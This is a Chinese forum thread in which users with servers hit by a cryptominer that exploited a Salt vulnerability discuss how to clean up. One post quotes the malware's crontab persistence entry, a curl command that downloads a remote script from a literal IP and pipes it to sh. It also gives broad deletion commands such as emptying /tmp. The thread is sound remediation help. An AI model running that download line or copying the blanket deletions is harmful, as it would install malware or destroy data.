salt-minion 错误

fengtian8888 · 发表于 2020-5-9 11:09:38

最近部署在腾讯云服务器，cup总是占用100%，在后台查看显示 salt-minion 占用100%，请问如何解决？kill掉了，不一会又会启动启动，严重影响使用。

fengtian8888 · 发表于 2020-5-9 11:14:55

  PID USER    PR  NI VIRT RES SHR S  %CPU %MEM    TIME+ COMMAND
15234 root    20 0  591584 1668 916 S 191.4  0.0 3:18.53 salt-minions
10271 root    20 0 2145100 362940  11652 S 1.0  9.4 1:21.83 java
7290 root    20 0 12212 7432 2620 S 0.3  0.2 0:02.17 docker-containe
9157 root    20 0 2168924 450112  11556 S 0.3 11.6 1:25.55 java
14250 root    20 0  162132 2516 1592 R 0.3  0.1 0:00.35 top
1 root    20 0 43640 4000 2544 S 0.0  0.1 0:01.54 systemd

fengtian8888 · 发表于 2020-5-9 13:00:32

腾讯云那边回复的是，最近出了一个挖矿病毒，专门针对salt-moinions ，有安全漏洞。目前封了4505和4506端口也不行。需要升级salt-minions 版本。

如果这个是牛刀部署时自动安装上去的，需要更新最新版本，请尽快解决！！！

fengtian8888 · 发表于 2020-5-9 13:44:19

https://bbs.kafan.cn/thread-2181320-1-1.html

joey · 发表于 2020-5-9 14:24:44

平台正在紧急处理中

zhenjunlove · 发表于 2020-5-9 16:48:18

我也遇到了。
平台正在紧急处理中

fengtian8888 · 发表于 2020-5-9 20:12:11

解决怎么样了？？？？？

wsh · 发表于 2020-5-9 21:13:33

手工清理病毒
1. ssh到自己的主机,top指令查看，如果有salt-minions之类的进程占满cpu，说明中招了，先卸载一下salt-minion
centos/redhat: yum remove salt-minion
ubuntu: apt remove salt-minion
2. 查看定时任务
crontab -l
如果看到类似这样
* * * * * curl http://217.8.117.137/c.sh | sh > /dev/null 2>&1
* * * * * /usr/bin/salt-store || /tmp/salt-store || /var/tmp/salt-store
用 crontab -e 指令编辑定时任务
进入编辑器后，把上面两行删除然后保存退出，删除（按两下d删除光标行）和退出（按冒号，光标在最下面，输入wq回车）可参考vim的基本用法
3. 把上面的文件删除
rm -f /usr/bin/salt-store
rm -f /tmp/salt-store
rm -f /var/tmp/salt-store
rm -f /tmp/*
rm -f /var/tmp/*
4. 杀干坏事的进程
ps aux |grep salt-store
如果有值，则用
kill xxx
杀掉，xxx就是进程id（第二列的那个数字）
同样的道理，用
ps aux |grep salt-minions
查看，并用kill杀
5. top 观察一下，是否还有salt-minions，如果没有就正常了

fengtian8888 · 发表于 2020-5-9 22:11:27

还是文总给力！！！多谢！！！！按您的方法已经解决了！！！

如何避免以后再被攻击？是否需要更新salt最新版本？

马搏士 · 发表于 2020-5-11 17:57:43

wsh 发表于 2020-5-9 21:13
手工清理病毒
1. ssh到自己的主机,top指令查看，如果有salt-minions之类的进程占满cpu，说明中招了，先卸载 ...

这个进程倒是kill了重启也不出现但程序也访问不了了

		自动登录	找回密码
密码			注册

[已结贴] salt-minion 错误